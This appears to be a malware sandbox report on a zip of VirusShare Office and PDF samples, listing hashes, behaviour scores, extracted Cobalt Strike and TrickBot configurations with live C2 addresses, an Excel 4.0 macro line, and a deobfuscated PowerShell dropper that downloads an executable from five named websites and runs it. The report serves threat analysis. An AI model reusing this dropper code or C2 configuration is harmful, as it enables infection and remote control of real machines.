Overview

overview

10

Static

static

10

virusshare...c9.xls

windows10-2004-x64

10

virusshare...c9.xls

windows11-21h2-x64

10

virusshare...f9.doc

windows10-2004-x64

10

virusshare...f9.doc

windows11-21h2-x64

10

virusshare...30.pdf

windows10-2004-x64

3

virusshare...30.pdf

windows11-21h2-x64

3

Sharing

Copy URL
Twitter E-mail

General

  • Target

    malware_samples.zip

  • Size

    19.1MB

  • Sample

    250416-javewstmz3

  • MD5

    d8e816c76ab1b9bc76e73b1aa0f88f2d

  • SHA1

    da193bad12f1b79f8c938d62e8029ba948433859

  • SHA256

    487f4dd9bdbe94a9cf1a04a8fdec19f16f86864d05d06f0511544b3ff68c850c

  • SHA512

    5bd84b71cb39d1d4952255cbabc45608c972757bb63a9f70606e0d2200154374f9e61f1c526ed1fe903b166e5d0b0458540b47da9c70434ae5b31a7b7d1bd02a

  • SSDEEP

    393216:ThCblxXJLB2mW/RxHedw0OZnq0NyWl9Hh9H2KAm4zI:ThSDZLI5xHea9Zf5XHD4zI

Score
10/10
cobaltstriketa505trickbotxmrig0ono33discoveryexecutionlinkmacromacro_on_actionminerpdfupx

Malware Config

Extracted

Family

cobaltstrike

Botnet

0

C2

http://ns7.softline.top:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

http://ns8.softline.top:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

http://ns9.softline.top:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
Attributes
  • access_type

    512

  • beacon_type

    256

  • create_remote_thread

    768

  • crypto_scheme

    256

  • host

    ns7.softline.top,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books,ns8.softline.top,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books,ns9.softline.top,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

  • http_header1

    AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAUSG9zdDogd3d3LmFtYXpvbi5jb20AAAAHAAAAAAAAAAMAAAACAAAADnNlc3Npb24tdG9rZW49AAAAAgAAAAxza2luPW5vc2tpbjsAAAABAAAALGNzbS1oaXQ9cy0yNEtVMTFCQjgyUlpTWUdKM0JES3wxNDE5ODk5MDEyOTk2AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • http_header2

    AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFEhvc3Q6IHd3dy5hbWF6b24uY29tAAAACQAAAApzej0xNjB4NjAwAAAACQAAABFvZT1vZT1JU08tODg1OS0xOwAAAAcAAAAAAAAABQAAAAJzbgAAAAkAAAAGcz0zNzE3AAAACQAAACJkY19yZWY9aHR0cCUzQSUyRiUyRnd3dy5hbWF6b24uY29tAAAABwAAAAEAAAADAAAABAAAAAAAAA==

  • http_method1

    GET

  • http_method2

    POST

  • maxdns

    255

  • pipe_name

    \\%s\pipe\msagent_%x

  • polling_time

    5000

  • port_number

    443

  • sc_process32

    %windir%\syswow64\rundll32.exe

  • sc_process64

    %windir%\sysnative\rundll32.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDI579oVVII0cYncGonU6vTWyFhqmq8w5QwvI8qsoWeV68Ngy+MjNPX2crcSVVWKQ3j09FII28KTmoE1XFVjEXF3WytRSlDe1OKfOAHX3XYkS9LcUAy0eRl2h4a73hrg1ir/rpisNT6hHtYaK3tmH8DgW/n1XfTfbWk1MZ7cXQHWQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    4096

  • unknown2

    AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • uri

    /N4215/adj/amzn.us.sr.aps

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

  • watermark

    0

Extracted

Family

trickbot

Version

1000501

Botnet

ono33

C2

5.182.210.226:443

5.182.210.120:443

185.65.202.183:443

212.80.217.243:443

85.143.218.249:443

194.5.250.178:443

198.15.119.121:443

107.175.87.142:443

185.14.31.72:443

188.165.62.2:443

194.5.250.179:443

198.15.119.71:443

185.14.29.4:443

185.99.2.202:443

192.3.193.162:443

89.191.234.89:443

195.54.32.12:443

31.131.21.30:443

5.34.177.194:443

190.214.13.2:449
Attributes
  • autorun
    Name:pwgrab
ecc_pubkey.base64
1
RUNTMzAAAADzIIbbIE3wcze1+xiwwK+Au/P78UrAO8YAHyPvHEwGVKOPphl8QVfrC7x/QaFYeXANw6E4HF7ietEp+7ZVQdWOx8c+HvO0Z2PTUPVbX9HAVrg4h9u1RNfhOHk+YysDLsg=

Extracted

Language
xlm4.0
Source
1
=CALL("C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\contract_.dll", "oakkzm", "")

Extracted

Language
ps1
Deobfuscated
1
$vhdrigpty = "Grnrlvjgqwiel"
2
$qhymddtpu = "882"
3
$qyfrfaxpspy = "Bnboragzlr"
4
$katqhsrg = $env:userprofile + "\\" + $qhymddtpu + ".exe"
5
$oajndrulr = "Sztguxzwwkuo"
6
$fuzjdsgve = new-object net.webclient
7
$vxyzyvysfm = "http://diwafashions.com/wp-admin/mqau6/", "http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/", "http://dixartcontractors.com/cgi-bin/nnuv/", "http://diaspotv.info/wordpress/G/", "http://easyvisaoverseas.com/cgi-bin/v/"
8
$puwqofghl = "Nbpxdnud"
9
foreach ($hdikcevbuczha in $vxyzyvysfm) {
10
try {
11
$fuzjdsgve.downloadfile($hdikcevbuczha, $katqhsrg)
12
$pyumbmvbvt = "Hnxyvcsn"
13
if ((get-item $katqhsrg).length -ge 28411) {
14
[diagnostics.process]::start($katqhsrg)
15
$ggwjysxz = "Xavcdmslgpx"
16
break
17
$ubafrskfyb = "Gfcxiyuamjn"
18
}
19
} catch {
20
}
URLs
exe.dropper

http://diwafashions.com/wp-admin/mqau6/
exe.dropper

http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/
exe.dropper

http://dixartcontractors.com/cgi-bin/nnuv/
exe.dropper

http://diaspotv.info/wordpress/G/
exe.dropper

http://easyvisaoverseas.com/cgi-bin/v/

Targets

    • Target

      virusshare/1/VirusShare_0fea640a7da27f365b3675f73626b9c9

    • Size

      937KB

    • MD5

      0fea640a7da27f365b3675f73626b9c9

    • SHA1

      fd4825f244e9c145486cb6930ad05695b9972668

    • SHA256

      64af94592f6707505fa6f42b58776c3635706a414e6362a92f707df84627679c

    • SHA512

      c9a10288762f3f5a3fdff17f8dd8560e7a884f1b83f405c2e85c6c86e42f69a30841c13aa0f2ecfc55aed42995d7aeb8fe40415e423ed0a306d2e7d00883dfbf

    • SSDEEP

      24576:h3zS0aqbCrxgFhFSQVB5DjDLG6/8otVBTN9s:K9Fo5VLDLGwTBT

    Score
    10/10
    ta505

    • TA505

      Cybercrime group active since 2015, responsible for families like Dridex and Locky.

      ta505

    • Ta505 family

      ta505

    • Loads dropped DLL

    behavioral1behavioral2

    • Target

      virusshare/1/VirusShare_1ba8249d8503c0cf7bc125588c43bef9

    • Size

      182KB

    • MD5

      1ba8249d8503c0cf7bc125588c43bef9

    • SHA1

      eb473c845c7474010ff35a3e8a169a9b6b9e5ebe

    • SHA256

      a44031feb2a71980a0980377c8f7b6f3b5b9dfa0f708556dd420be323c7e1a38

    • SHA512

      b5421ca474e8ccd30683b90a83e98c6ba74c8418201aaa923ba6c7805ef724b37dfabb74cfedccbb69e3fcf923635f64faa406f280057404f78957df3d840c8c

    • SSDEEP

      3072:9NO2y/GdywFyktGDWLS0HZWD5w8K7Nk9rD7IBU9asiv8Oc7V:9NO2k4PF7tGiL3HJk9rD7b9asiv8dZ

    Score
    10/10
    execution

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Deletes itself

    behavioral3behavioral4

    • Target

      virusshare/1/VirusShare_3cd9a967b67fe69351e390195ca7a430

    • Size

      32KB

    • MD5

      3cd9a967b67fe69351e390195ca7a430

    • SHA1

      4e7f309d283182d76377ad02616a6a5933cac649

    • SHA256

      e96e3b90d9483a2e463fdda0edf27310ed10fbdb8a8b920c6480ca93bb2e1077

    • SHA512

      ffe9ffe8555ef0b914bdcaea5b50eb501c4b0d03726ab6f2baa0e5cf6875d9b0ac735679dbd03810d3f03905402f382bf32e3227bd2a11c0eef173082cb02273

    • SSDEEP

      768:XDNivfrO+Av3qpOCy71ShZ2/p1oaVBV2iKL2GmqBmmSE5fXuMZmwgCLWar8v:XB6zrAv3qpOCy71ShZ2R1osBV2iKL25p

    Score
    3/10
    discovery
    behavioral5behavioral6

MITRE ATT&CK Enterprise v16

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.